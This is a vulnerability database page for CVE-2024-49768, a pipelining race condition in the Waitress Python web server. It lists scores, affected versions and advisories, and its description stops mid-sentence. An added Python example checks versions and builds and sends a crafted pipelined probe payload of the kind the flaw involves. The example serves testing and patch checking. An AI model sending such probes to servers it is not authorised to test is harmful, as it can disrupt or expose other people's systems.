CVE-2024-49768: Time-of-check Time-of-use (TOCTOU) Race Condition in Waitress

Severity
NVD: 4.8 MEDIUM
CNA: 9.1
EPSS
0.6% (top 31.29%)
CISA KEV
Not in KEV
Exploit
No known exploits
Timeline
Published: Oct 29, 2024
Latest update: Nov 19, 2024

Description

Waitress is a Web Server Gateway Interface server for Python 2 and 3. A remote client may send a request that is exactly recv_bytes (defaults to 8192) long, followed by a secondary request using HTTP pipelining. When request lookahead is disabled (default) we won't read any more requests, and when the first request fails due to a parsing error, we simply close the connection. However when request lookahead is enabled, it is possible to process and receive the first request, start sending the err
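The description above names the ingredients of the condition: a first request that is exactly recv_bytes long (8192 by default), a parsing error on that request, a second request pipelined behind it, and request lookahead enabled. What follows is an added example, not code from the cvebase page or from the Waitress project. It checks a version against the affected range the page lists (>= 2.0.0, < 3.0.1) and builds a two-request payload of the shape the description gives, so the behaviour can be compared on a test instance you control. The page does not name the lookahead option; in Waitress it is the channel_request_lookahead server setting, whose default of 0 is the "disabled" state the description refers to. The header line used to make the first request malformed, the X-Pad filler header and the /first and /second paths are this example's own assumptions.

```python
"""Added example for CVE-2024-49768; not code from the cvebase page or the
Waitress project.  Provides (1) a version-range check against the affected
range the page lists and (2) a builder for the request shape the description
gives: a malformed first request that is exactly recv_bytes (8192) long,
followed by a pipelined second request.  The malformed header line, the X-Pad
filler header and the /first and /second paths are this example's choices."""
import re
import socket
from typing import Optional, Tuple

AFFECTED_MIN = (2, 0, 0)   # first affected release (from the page)
FIXED = (3, 0, 1)          # first fixed release (from the page)
DEFAULT_RECV_BYTES = 8192  # waitress recv_bytes default, as the description states

_VERSION_RE = re.compile(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?")
_STATUS_LINE_RE = re.compile(rb"^HTTP/1\.[01] \d{3}", re.M)


def parse_version(version: str) -> Tuple[int, int, int]:
    """'3.0.0' -> (3, 0, 0).  Pre-release suffixes such as 'rc1' are dropped,
    which is enough for a major.minor.patch range check."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    major, minor, patch = (int(x or 0) for x in m.groups())
    return (major, minor, patch)


def is_affected(version: str) -> bool:
    """True when version lies in [2.0.0, 3.0.1), the range the page lists."""
    return AFFECTED_MIN <= parse_version(version) < FIXED


def installed_waitress_affected() -> Optional[bool]:
    """Check the waitress importable in this interpreter; None if not installed."""
    from importlib.metadata import PackageNotFoundError, version
    try:
        return is_affected(version("waitress"))
    except PackageNotFoundError:
        return None


def build_pipelined_probe(host: str = "localhost",
                          recv_bytes: int = DEFAULT_RECV_BYTES) -> Tuple[bytes, bytes]:
    """Return (first, second).  first is padded so its length is exactly
    recv_bytes and carries a header line with no ':' separator, which is
    assumed (not stated on the page) to trigger the parsing error the
    description mentions; second is an ordinary pipelined GET."""
    head = (f"GET /first HTTP/1.1\r\nHost: {host}\r\n"
            "Header-Line-Without-Colon\r\n"   # assumed malformed header line
            "X-Pad: ").encode("ascii")        # filler header, this example's choice
    tail = b"\r\n\r\n"
    pad_len = recv_bytes - len(head) - len(tail)
    if pad_len < 0:
        raise ValueError("recv_bytes is smaller than the fixed part of the request")
    first = head + b"A" * pad_len + tail
    second = f"GET /second HTTP/1.1\r\nHost: {host}\r\n\r\n".encode("ascii")
    return first, second


def count_responses(raw: bytes) -> int:
    """Number of HTTP status lines in a raw byte stream, i.e. how many of the
    pipelined requests the server answered before closing."""
    return len(_STATUS_LINE_RE.findall(raw))


def send_probe(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Write first+second in a single send to a server you are authorised to
    test and return whatever comes back before the connection closes or the
    read times out.  Compare runs with channel_request_lookahead=0 (default)
    against a non-zero value, and waitress < 3.0.1 against 3.0.1."""
    first, second = build_pipelined_probe(host)
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(first + second)
        try:
            while True:
                data = s.recv(65536)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


if __name__ == "__main__":
    print("installed waitress affected:", installed_waitress_affected())
    first, second = build_pipelined_probe()
    print("first request length:", len(first), "second request length:", len(second))
```

Only the version range and the 8192-byte default come from the page; because the description is cut off, the example makes no claim about what the server does with the second request, and count_responses() simply lets you compare how many status lines come back across the configurations named in send_probe(). Run installed_waitress_affected() on each host that serves Python WSGI applications through Waitress; a True result with a non-zero channel_request_lookahead is the configuration the description singles out, and upgrading to 3.0.1 closes it in either configuration.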

CVSS vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
Exploitability: 2.2 | Impact: 2.5

Affected Packages (2 packages)

Source     | Package              | Affected range
NVD        | agendaless/waitress  | 2.0.0 to 3.0.1 (fixed in 3.0.1)
CVEList V5 | pylons/waitress      | >= 2.0.0, < 3.0.1

Patches

Vulnerability Details (5)

OSV      2024-11-19  Waitress vulnerabilities
CVEList  2024-10-29  Waitress has request processing race condition in HTTP pipelining with invalid first request
GHSA     2024-10-29  Waitress has request processing race condition in HTTP pipelining with invalid first request
OSV      2024-10-29  Waitress has request processing race condition in HTTP pipelining with invalid first request
OSV      2024-10-29  CVE-2024-49768: Waitress is a Web Server Gateway Interface server for Python 2 and 3

Vendor Advisories (3)

Ubuntu   2024-11-19  Waitress vulnerabilities
Red Hat  2024-10-29  waitress: python-waitress: request processing race condition in HTTP pipelining with invalid first request
Debian   2024        CVE-2024-49768: waitress - Waitress is a Web Server Gateway Interface server for Python 2 and 3. A remote c...
CVE-2024-49768 — Agendaless Waitress vulnerability | cvebase